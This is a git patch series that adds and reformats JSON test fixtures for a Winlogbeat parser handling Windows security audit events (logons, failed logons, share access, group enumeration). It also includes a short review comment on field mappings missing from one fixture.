+ "original": "A user's local group membership was enumerated.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACC0123$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nUser:\n\tSecurity ID:\t\tS-3-4-5\n\tAccount Name:\t\tGuest\n\tAccount Domain:\t\tACC0123\n\nProcess Information:\n\tProcess ID:\t\t0x123\n\tProcess Name:\t\tC:\\Program Files\\program.exe",
+ "outcome": "success",
+ "provider": "Microsoft-Windows-Security-Auditing"
+ },
+ "@timestamp": "2024-11-12T08:25:34.741000Z",
+ "action": {
+ "id": 4798,
+ "outcome": "success",
+ "properties": {
+ "CallerProcessId": "0x123",
+ "CallerProcessName": "C:\\Program Files\\program.exe",
+ "SubjectDomainName": "DOMAIN",
+ "SubjectLogonId": "0x3e7",
+ "SubjectUserName": "ACC0123$",
+ "SubjectUserSid": "S-1-2-3",
+ "TargetDomainName": "ACC0123",
+ "TargetSid": "S-3-4-5",
+ "TargetUserName": "Guest"
+ }
+ },
+ "agent": {
+ "ephemeral_id": "12345678-90ab-cdef-1234-123456abcdef",
+ "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
+ "name": "ACC0123",
+ "type": "filebeat",
+ "version": "8.14.1"
+ },
+ "host": {
+ "architecture": "x86_64",
+ "hostname": "hostname",
+ "id": "12345678-90ef-abcd-1234-abcdef123456",
+ "ip": [
+ "1.2.3.4"
+ ],
+ "mac": [
+ "00-11-22-33-44-55"
+ ],
+ "name": "hostname",
+ "os": {
+ "build": "20348.169",
+ "family": "windows",
+ "kernel": "10.0.20348.169 (WinBuild.160101.0800)",
+ "name": "Windows Server 2022 Standard",
+ "platform": "windows",
+ "type": "windows",
+ "version": "10.0"
+ }
+ },
+ "log": {
+ "level": "information"
+ },
+ "related": {
+ "hosts": [
+ "hostname"
+ ],
+ "ip": [
+ "1.2.3.4"
+ ],
+ "user": [
+ "ACC0123"
+ ]
+ },
+ "user": {
+ "domain": "DOMAIN",
+ "id": "S-1-2-3",
+ "name": "ACC0123",
+ "target": {
+ "domain": "ACC0123",
+ "name": "Guest"
+ }
+ },
+ "winlog": {
+ "activity_id": "{11111111-2222-3333-4444-555555555555}",
+ "api": "wineventlog",
+ "channel": "Security",
+ "computer_name": "ACC0123.johndoe.com",
+ "event_id": "4798",
+ "keywords": [
+ "Audit Success"
+ ],
+ "logon": {
+ "id": "0x3e7"
+ },
+ "opcode": "Info",
+ "process": {
+ "pid": 668,
+ "thread": {
+ "id": 8860
+ }
+ },
+ "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+ "provider_name": "Microsoft-Windows-Security-Auditing",
+ "record_id": "1524672",
+ "task": "User Account Management"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_5140.json b/Beats/winlogbeat/tests/security_event_5140.json
index cde1d5c3c..8413484f9 100644
--- a/Beats/winlogbeat/tests/security_event_5140.json
+++ b/Beats/winlogbeat/tests/security_event_5140.json
@@ -93,11 +93,6 @@
 "api": "wineventlog",
 "channel": "Security",
 "computer_name": "HOST01.company.test",
- "event_data": {
- "AccessMaskDescription": [
- "Create Child"
- ]
- },
 "event_id": "5140",
 "keywords": [
 "Audit Success"
diff --git a/Beats/winlogbeat/tests/security_event_5145.json b/Beats/winlogbeat/tests/security_event_5145.json
index 99a17d54f..ec1e78d54 100644
--- a/Beats/winlogbeat/tests/security_event_5145.json
+++ b/Beats/winlogbeat/tests/security_event_5145.json
@@ -96,13 +96,6 @@
 "api": "wineventlog",
 "channel": "Security",
 "computer_name": "host01.company.test",
- "event_data": {
- "AccessMaskDescription": [
- "List Object",
- "READ_CONTROL",
- "SYNCHRONIZE"
- ]
- },
 "event_id": "5145",
 "keywords": [
 "Audit Success"
From ce15f8192df09ce7a518c56479354e2ad1ffe28e Mon Sep 17 00:00:00 2001
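Review bot: The expected output of this new 4798 fixture leaves the two pivots analysts need for local group-membership enumeration unmapped: `action.properties.CallerProcessName` / `CallerProcessId` are carried raw but no `process.executable` / `process.pid` appear, and `related.user` lists only the subject `ACC0123` while the enumerated target `Guest` exists only under `user.target.name`. A fixture records whatever the parser currently emits, so if this is the real output the gap belongs to the parser (parser.yml is not in view here) rather than to this file, but committing the expectation as-is locks it in; worth confirming the omission is intended. Minor: `record_id` is expected as the string `"1524672"` although the input carries the integer `1524672`; this matches the 4769 fixture above, so it is presumably the intake's convention and not a regression.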
From: LenaigKaliou Date: Thu, 14 Nov 2024 11:43:35 +0100 Subject: [PATCH 228/317] fixed linting issues --- Beats/winlogbeat/tests/security_event_4624.json | 4 ++-- Beats/winlogbeat/tests/security_event_4625.json | 4 ++-- Beats/winlogbeat/tests/security_event_4634.json | 4 ++-- Beats/winlogbeat/tests/security_event_4662.json | 4 ++-- Beats/winlogbeat/tests/security_event_4672.json | 4 ++-- Beats/winlogbeat/tests/security_event_4689.json | 4 ++-- Beats/winlogbeat/tests/security_event_4720.json | 4 ++-- Beats/winlogbeat/tests/security_event_4722.json | 4 ++-- Beats/winlogbeat/tests/security_event_4723.json | 4 ++-- Beats/winlogbeat/tests/security_event_4725.json | 4 ++-- Beats/winlogbeat/tests/security_event_4726.json | 4 ++-- Beats/winlogbeat/tests/security_event_4768.json | 4 ++-- Beats/winlogbeat/tests/security_event_4769.json | 4 ++-- Beats/winlogbeat/tests/security_event_4798.json | 4 ++-- 14 files changed, 28 insertions(+), 28 deletions(-) diff --git a/Beats/winlogbeat/tests/security_event_4624.json b/Beats/winlogbeat/tests/security_event_4624.json index 9e8cdfb26..fe8a200a5 100644 --- a/Beats/winlogbeat/tests/security_event_4624.json +++ b/Beats/winlogbeat/tests/security_event_4624.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}" + } }, "expected": { "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", diff --git a/Beats/winlogbeat/tests/security_event_4625.json b/Beats/winlogbeat/tests/security_event_4625.json index ac5882d46..85bda7ac7 100644 --- a/Beats/winlogbeat/tests/security_event_4625.json +++ b/Beats/winlogbeat/tests/security_event_4625.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname
\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit 
Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}" + } }, "expected": { "message": 
"{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bb